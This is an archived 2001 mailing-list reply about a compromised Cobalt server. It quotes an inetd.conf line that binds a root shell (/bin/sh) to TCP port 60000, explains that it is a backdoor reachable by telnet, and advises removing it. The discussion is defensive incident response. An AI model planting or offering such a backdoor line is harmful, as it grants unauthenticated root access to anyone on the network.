[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [cobalt-users] Sigh, more security breaches

Subject: RE: [cobalt-users] Sigh, more security breaches
From: "Sean Chester" <seanc@xxxxxxxxxxxxxxxxxxxxxx>
Date: Fri Mar 9 01:48:03 2001
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

-----Original Message-----
>Subject: [cobalt-users] Sigh, more security breaches

>   60000 stream tcp nowait root /bin/sh sh -i

>Does this looks familiar to anyone?

someone has put a rootshell on port 60000
all they need to do is telnet to port 60000 and they got r00t.

remove the line from you inetd.conf and check your system.

Follow-Ups:
- [cobalt-users] [raq4] logcheck installation failed?
  - From: Edwin Nouwen

References:
- [cobalt-users] Sigh, more security breaches
  - From: Boon Yeo

Prev by Date: [cobalt-users] proxy abuse/porn-site banner-ad impression scripts
Next by Date: RE: [cobalt-users] Searching for files of a particular date?
Previous by thread: Re: [cobalt-users] Sigh, more security breaches
Next by thread: [cobalt-users] [raq4] logcheck installation failed?

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index